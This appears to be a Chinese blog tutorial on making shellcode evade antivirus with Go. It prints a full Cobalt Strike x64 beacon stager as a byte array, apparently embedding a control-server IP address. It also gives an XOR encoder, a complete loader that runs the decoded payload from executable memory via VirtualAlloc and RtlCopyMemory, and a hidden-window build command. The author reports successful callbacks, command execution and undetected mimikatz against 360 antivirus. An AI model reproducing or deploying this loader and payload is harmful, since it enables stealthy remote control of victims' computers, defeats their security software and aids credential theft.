利用golang免杀shellcode
0x00:前言
shellcode 分离混淆免杀已经是一个很古老的话题了,其中有c++加载器、python加载器、golong加载器加载shellcode执行,由于c++不熟所以没想从这里入手,python实验了好几天,各种兼容问题深受其烦,最后不得已选golang
0x01:什么是shellcode
shellcode
在维基百科中这样解释道:在黑客攻击中,shellcode是一小段代码,用于利用软件漏洞作为有效载荷。它之所以被称为“shellcode”,是因为它通常启动一个命令shell,攻击者可以从这个命令shell控制受损的计算机,但是执行类似任务的任何代码都可以被称为shellcode。因为有效载荷(payload)的功能不仅限于生成shell,所以有些人认为shellcode的名称是不够严谨的。然而,试图取代这一术语的努力并没有得到广泛的接受。shellcode通常是用机器码编写的。
翻译成人话就是:shellcode是一段机器码,用于执行某些动作。一般用来执行开启套接字操作。
0x02:环境搭建
golang编译环境:https://golang.google.cn/dl/ 下载windows版本即可
安装完毕后cmd 输入 go,出现以下则说明安装成功
0x03:构造
首先需要获得shellcode
msf或者cs自带的shellcode都可以
我们这里先选用CS的shellcode
将双引号内的shellcode摘出来
将其转换为0x格式
这里如果直接使用加载器加载shellcode会被一些杀软杀掉,所以需要对其进行异或混淆一下,加载器解回原始数据即可
这里使用go或者python异或都可以
这里使用的是go
import "fmt"
const (
KEY_1 = 55
KEY_2 = 66
)
func main() {
shellcode := []byte{0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x75,0x72,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x00,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x73,0x5a,0x48,0x89,0xc1,0x41,0xb8,0x90,0x1f,0x00,0x00,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x03,0x41,0x51,0x41,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x59,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x00,0x02,0x40,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x85,0x9d,0x01,0x00,0x00,0x48,0xff,0xcf,0x0f,0x84,0x8c,0x01,0x00,0x00,0xeb,0xd3,0xe9,0xe4,0x01,0x00,0x00,0xe8,0xa2,0xff,0xff,0xff,0x2f,0x35,0x74,0x4b,0x69,0x00,0x8f,0x16,0x7e,0xca,0x0e,0x8c,0xad,0x7a,0x58,0x83,0x7a,0x8b,0x66,0xaf,0x5c,0xed,0xfc,0xef,0x57,0x42,0xde,0xf1,0xd7,0x3a,0x9f,0xf8,0x0e,0xdc,0x86,0xf1,0xd7,0xf0,0x7f,0x0b,0xfe,0xb6,0x78,0x2c,0x25,0x07,0x39,0x3b,0xa0,0x34,0x0a,0x8d,0x06,0x61,0x11,0x54,0x8c,0x3d,0xea,0x35,0x14,0x3e,0xb2,0x0a,0x5e,0x7f,0x0f,0xe5,0x0e,0x36,0x7a,0x5c,0x19,0xfa,0xa9,0x39,0xf4,0xe8,0xf4,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x31,0x30,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x32,0x3b,0x20,0x57,0x4f,0x57,0x36,0x34,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x36,0x2e,0x30,0x3b,0x20,0x54,0x6f,0x75,0x63,0x68,0x3b,0x20,0x4d,0x41,0x4c,0x43,0x4a,0x53,0x29,0x0d,0x0a,0x00,0xb7,0x76,0x60,0x7d,0x86,0x2f,0x5c,0x95,0x70,0xf1,0xe7,0x5d,0x58,0x5a,0x0e,0x54,0x58,0x14,0x50,0xcd,0xa0,0x9c,0xd0,0x9e,0xc0,0x11,0x18,0x0a,0xd8,0x52,0xce,0x45,0xc6,0xd0,0xa3,0x09,0x12,0xbf,0x98,0xe7,0x5f,0x8e,0xbd,0xba,0x76,0xf9,0xc5,0xb3,0x1d,0x98,0xfc,0xf9,0x43,0xdd,0xfe,0x8d,0x4f,0x99,0xeb,0x99,0xd4,0xd8,0xd1,0x19,0xfa,0xd7,0x95,0xa6,0x84,0x37,0x05,0x4b,0x8e,0xf8,0x37,0x74,0x80,0xd7,0x2b,0x52,0xf3,0x23,0x2e,0xd6,0x40,0xcc,0xfa,0x33,0xbe,0x6a,0xe6,0x0e,0xe5,0xac,0x8f,0x95,0xc3,0x90,0x4e,0x43,0x8d,0x34,0x68,0x8f,0x47,0x5a,0x37,0x83,0x95,0x47,0x53,0x6d,0xc2,0xe2,0xa3,0xd0,0xe5,0xc4,0x89,0xa9,0xfb,0xd3,0x11,0x65,0x7e,0x58,0x14,0x33,0xaa,0x37,0x63,0xda,0x54,0x7b,0x61,0x73,0xf4,0xa7,0x9c,0xd0,0xb0,0x17,0xa1,0x4f,0x66,0x9f,0x42,0xa0,0xa1,0x1c,0xe3,0xf5,0x43,0x09,0x58,0x89,0x1c,0x20,0x3a,0x9c,0xb9,0x8b,0x93,0xa1,0x12,0x2c,0x71,0x56,0x8e,0xde,0x69,0x0d,0x7f,0xdc,0x58,0xcc,0x3d,0xbe,0xfc,0xc0,0xfb,0x8d,0x68,0x15,0x6f,0x37,0xf2,0xdd,0x54,0x11,0x6e,0x00,0xb8,0x62,0x7a,0x23,0x06,0x21,0x54,0xfb,0xdb,0x63,0x00,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x00,0x00,0x40,0x00,0x41,0xb8,0x00,0x10,0x00,0x00,0x41,0xb9,0x40,0x00,0x00,0x00,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xc3,0xe8,0x9f,0xfd,0xff,0xff,0x31,0x32,0x39,0x2e,0x32,0x31,0x31,0x2e,0x38,0x33,0x2e,0x35,0x31,0x00,0x6f,0xaa,0x51,0xc3}
fmt.Print("{")
for i := 0; i < len(shellcode); i++ {
fmt.Print(shellcode[i]^KEY_1^KEY_2, ",")
}
fmt.Print("}")
}
然后将混淆后的值改为hex值
填入shellcode至数组 该文件为标准golang sellcode 加载器
import (
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
KEY_1 = 55
KEY_2 = 66
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
func main() {
xor_shellcode := []byte{0x89,0x3d,0xf6,0x91,0x85,0x9d,0xbd,0x75,0x75,0x75,0x34,0x24,0x34,0x25,0x27,0x24,0x23,0x3d,0x44,0xa7,0x10,0x3d,0xfe,0x27,0x15,0x3d,0xfe,0x27,0x6d,0x3d,0xfe,0x27,0x55,0x3d,0xfe,0x7,0x25,0x3d,0x7a,0xc2,0x3f,0x3f,0x38,0x44,0xbc,0x3d,0x44,0xb5,0xd9,0x49,0x14,0x9,0x77,0x59,0x55,0x34,0xb4,0xbc,0x78,0x34,0x74,0xb4,0x97,0x98,0x27,0x34,0x24,0x3d,0xfe,0x27,0x55,0xfe,0x37,0x49,0x3d,0x74,0xa5,0x13,0xf4,0xd,0x6d,0x7e,0x77,0x0,0x7,0xfe,0xf5,0xfd,0x75,0x75,0x75,0x3d,0xf0,0xb5,0x1,0x12,0x3d,0x74,0xa5,0x25,0xfe,0x3d,0x6d,0x31,0xfe,0x35,0x55,0x3c,0x74,0xa5,0x96,0x23,0x3d,0x8a,0xbc,0x34,0xfe,0x41,0xfd,0x3d,0x74,0xa3,0x38,0x44,0xbc,0x3d,0x44,0xb5,0xd9,0x34,0xb4,0xbc,0x78,0x34,0x74,0xb4,0x4d,0x95,0x0,0x84,0x39,0x76,0x39,0x51,0x7d,0x30,0x4c,0xa4,0x0,0xad,0x2d,0x31,0xfe,0x35,0x51,0x3c,0x74,0xa5,0x13,0x34,0xfe,0x79,0x3d,0x31,0xfe,0x35,0x69,0x3c,0x74,0xa5,0xfe,0x71,0xfd,0x3d,0x74,0xa5,0x34,0x2d,0x34,0x2d,0x2b,0x2c,0x2f,0x34,0x2d,0x34,0x2c,0x34,0x2f,0x3d,0xf6,0x99,0x55,0x34,0x27,0x8a,0x95,0x2d,0x34,0x2c,0x2f,0x3d,0xfe,0x67,0x9c,0x3a,0x8a,0x8a,0x8a,0x28,0x1f,0x75,0x3c,0xcb,0x2,0x1c,0x1b,0x1c,0x1b,0x10,0x1,0x75,0x34,0x23,0x3c,0xfc,0x93,0x39,0xfc,0x84,0x34,0xcf,0x39,0x2,0x53,0x72,0x8a,0xa0,0x3d,0x44,0xbc,0x3d,0x44,0xa7,0x38,0x44,0xb5,0x38,0x44,0xbc,0x34,0x25,0x34,0x25,0x34,0xcf,0x4f,0x23,0xc,0xd2,0x8a,0xa0,0x9e,0x6,0x2f,0x3d,0xfc,0xb4,0x34,0xcd,0xe5,0x6a,0x75,0x75,0x38,0x44,0xbc,0x34,0x24,0x34,0x24,0x1f,0x76,0x34,0x24,0x34,0xcf,0x22,0xfc,0xea,0xb3,0x8a,0xa0,0x9e,0x2c,0x2e,0x3d,0xfc,0xb4,0x3d,0x44,0xa7,0x3c,0xfc,0xad,0x38,0x44,0xbc,0x27,0x1d,0x75,0x77,0x35,0xf1,0x27,0x27,0x34,0xcf,0x9e,0x20,0x5b,0x4e,0x8a,0xa0,0x3d,0xfc,0xb3,0x3d,0xf6,0xb6,0x25,0x1f,0x7f,0x2a,0x3d,0xfc,0x84,0x3d,0xfc,0xaf,0x3c,0xb2,0xb5,0x8a,0x8a,0x8a,0x8a,0x38,0x44,0xbc,0x27,0x27,0x34,0xcf,0x58,0x73,0x6d,0xe,0x8a,0xa0,0xf0,0xb5,0x7a,0xf0,0xe8,0x74,0x75,0x75,0x3d,0x8a,0xba,0x7a,0xf1,0xf9,0x74,0x75,0x75,0x9e,0xa6,0x9c,0x91,0x74,0x75,0x75,0x9d,0xd7,0x8a,0x8a,0x8a,0x5a,0x40,0x1,0x3e,0x1c,0x75,0xfa,0x63,0xb,0xbf,0x7b,0xf9,0xd8,0xf,0x2d,0xf6,0xf,0xfe,0x13,0xda,0x29,0x98,0x89,0x9a,0x22,0x37,0xab,0x84,0xa2,0x4f,0xea,0x8d,0x7b,0xa9,0xf3,0x84,0xa2,0x85,0xa,0x7e,0x8b,0xc3,0xd,0x59,0x50,0x72,0x4c,0x4e,0xd5,0x41,0x7f,0xf8,0x73,0x14,0x64,0x21,0xf9,0x48,0x9f,0x40,0x61,0x4b,0xc7,0x7f,0x2b,0xa,0x7a,0x90,0x7b,0x43,0xf,0x29,0x6c,0x8f,0xdc,0x4c,0x81,0x9d,0x81,0x75,0x20,0x6,0x10,0x7,0x58,0x34,0x12,0x10,0x1b,0x1,0x4f,0x55,0x38,0x1a,0xf,0x1c,0x19,0x19,0x14,0x5a,0x40,0x5b,0x45,0x55,0x5d,0x16,0x1a,0x18,0x5,0x14,0x1,0x1c,0x17,0x19,0x10,0x4e,0x55,0x38,0x26,0x3c,0x30,0x55,0x44,0x45,0x5b,0x45,0x4e,0x55,0x22,0x1c,0x1b,0x11,0x1a,0x2,0x6,0x55,0x3b,0x21,0x55,0x43,0x5b,0x47,0x4e,0x55,0x22,0x3a,0x22,0x43,0x41,0x4e,0x55,0x21,0x7,0x1c,0x11,0x10,0x1b,0x1,0x5a,0x43,0x5b,0x45,0x4e,0x55,0x21,0x1a,0x0,0x16,0x1d,0x4e,0x55,0x38,0x34,0x39,0x36,0x3f,0x26,0x5c,0x78,0x7f,0x75,0xc2,0x3,0x15,0x8,0xf3,0x5a,0x29,0xe0,0x5,0x84,0x92,0x28,0x2d,0x2f,0x7b,0x21,0x2d,0x61,0x25,0xb8,0xd5,0xe9,0xa5,0xeb,0xb5,0x64,0x6d,0x7f,0xad,0x27,0xbb,0x30,0xb3,0xa5,0xd6,0x7c,0x67,0xca,0xed,0x92,0x2a,0xfb,0xc8,0xcf,0x3,0x8c,0xb0,0xc6,0x68,0xed,0x89,0x8c,0x36,0xa8,0x8b,0xf8,0x3a,0xec,0x9e,0xec,0xa1,0xad,0xa4,0x6c,0x8f,0xa2,0xe0,0xd3,0xf1,0x42,0x70,0x3e,0xfb,0x8d,0x42,0x1,0xf5,0xa2,0x5e,0x27,0x86,0x56,0x5b,0xa3,0x35,0xb9,0x8f,0x46,0xcb,0x1f,0x93,0x7b,0x90,0xd9,0xfa,0xe0,0xb6,0xe5,0x3b,0x36,0xf8,0x41,0x1d,0xfa,0x32,0x2f,0x42,0xf6,0xe0,0x32,0x26,0x18,0xb7,0x97,0xd6,0xa5,0x90,0xb1,0xfc,0xdc,0x8e,0xa6,0x64,0x10,0xb,0x2d,0x61,0x46,0xdf,0x42,0x16,0xaf,0x21,0xe,0x14,0x6,0x81,0xd2,0xe9,0xa5,0xc5,0x62,0xd4,0x3a,0x13,0xea,0x37,0xd5,0xd4,0x69,0x96,0x80,0x36,0x7c,0x2d,0xfc,0x69,0x55,0x4f,0xe9,0xcc,0xfe,0xe6,0xd4,0x67,0x59,0x4,0x23,0xfb,0xab,0x1c,0x78,0xa,0xa9,0x2d,0xb9,0x48,0xcb,0x89,0xb5,0x8e,0xf8,0x1d,0x60,0x1a,0x42,0x87,0xa8,0x21,0x64,0x1b,0x75,0xcd,0x17,0xf,0x56,0x73,0x54,0x21,0x8e,0xae,0x16,0x75,0x34,0xcb,0x85,0xc0,0xd7,0x23,0x8a,0xa0,0x3d,0x44,0xbc,0xcf,0x75,0x75,0x35,0x75,0x34,0xcd,0x75,0x65,0x75,0x75,0x34,0xcc,0x35,0x75,0x75,0x75,0x34,0xcf,0x2d,0xd1,0x26,0x90,0x8a,0xa0,0x3d,0xe6,0x26,0x26,0x3d,0xfc,0x92,0x3d,0xfc,0x84,0x3d,0xfc,0xaf,0x34,0xcd,0x75,0x55,0x75,0x75,0x3c,0xfc,0x8c,0x34,0xcf,0x67,0xe3,0xfc,0x97,0x8a,0xa0,0x3d,0xf6,0xb1,0x55,0xf0,0xb5,0x1,0xc3,0x13,0xfe,0x72,0x3d,0x74,0xb6,0xf0,0xb5,0x0,0xa2,0x2d,0x2d,0x2d,0x3d,0x70,0x75,0x75,0x75,0x75,0x25,0xb6,0x9d,0xea,0x88,0x8a,0x8a,0x44,0x47,0x4c,0x5b,0x47,0x44,0x44,0x5b,0x4d,0x46,0x5b,0x40,0x44,0x75,0x1a,0xdf,0x24,0xb6}
var shellcode []byte
for i := 0; i < len(xor_shellcode); i++ {
shellcode = append(shellcode, xor_shellcode[i]^KEY_1^KEY_2)
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
syscall.Syscall(addr, 0, 0, 0, 0)
}
然后编译即可 go build -ldflags "-H=windowsgui" test.go
此命令可使可执行文件后台执行
在靶机(360全家桶)上运行该软件
成功上线
尝试执行命令
文件管理
尝试mimikatz
360一点反应没有
同理 msf也可以 正常上线,同时也可以增加加密复杂程度等等
全球网站杀毒情况 2/55